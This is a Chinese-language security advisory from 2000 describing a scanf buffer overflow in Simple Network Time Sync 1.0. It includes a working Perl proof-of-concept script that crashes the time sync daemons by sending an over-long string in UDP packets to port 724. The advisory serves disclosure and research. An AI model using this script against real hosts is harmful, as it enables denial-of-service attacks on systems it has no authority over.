发布日期：2000-06-02
更新日期：2000-06-03

受影响系统：

Atrus Trivalie Productions Simple Network Time Sync 1.0

描述：

---

    Atrus Trivalie 的Simple Network Time Sync 1.0程序中存在一个有问题的
    scanf 函数调用，导致缓冲区溢出漏洞，此问题在RedHat 6.1上测试过。
    攻击者有可能利用这个漏洞获取root权限，不过似乎只有50个字节的空间用于填
    充shellcode。

    <* 来源：Ben Taylor fragment001@hotmail.com *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

send_packet(); # Needs to send 2 packets to kill the client and the server
daemons
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);

$|=1;

connect(SH, $sin) || die "$!\n";

# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);

}


建议：

---

暂无

浏览次数：6121
严重程度：0（网友投票）